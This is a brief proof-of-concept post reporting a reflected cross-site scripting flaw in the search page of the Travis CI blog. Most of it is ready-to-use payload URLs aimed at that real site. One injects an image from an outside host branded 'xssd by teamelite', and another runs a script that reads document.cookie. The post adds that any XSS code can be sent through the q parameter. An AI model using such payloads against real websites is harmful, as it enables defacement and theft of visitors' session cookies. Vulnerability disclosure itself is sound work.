Travis CI blog XSS bug
Vulnerable page: https://blog.travis-ci.com/PoC
https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>
PoC
https://blog.travis-ci.com/search?q="><script>alert(document.cookie)</script>
You can either include any XSS code in search input box, or request any XSS code directly using GET method and q parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.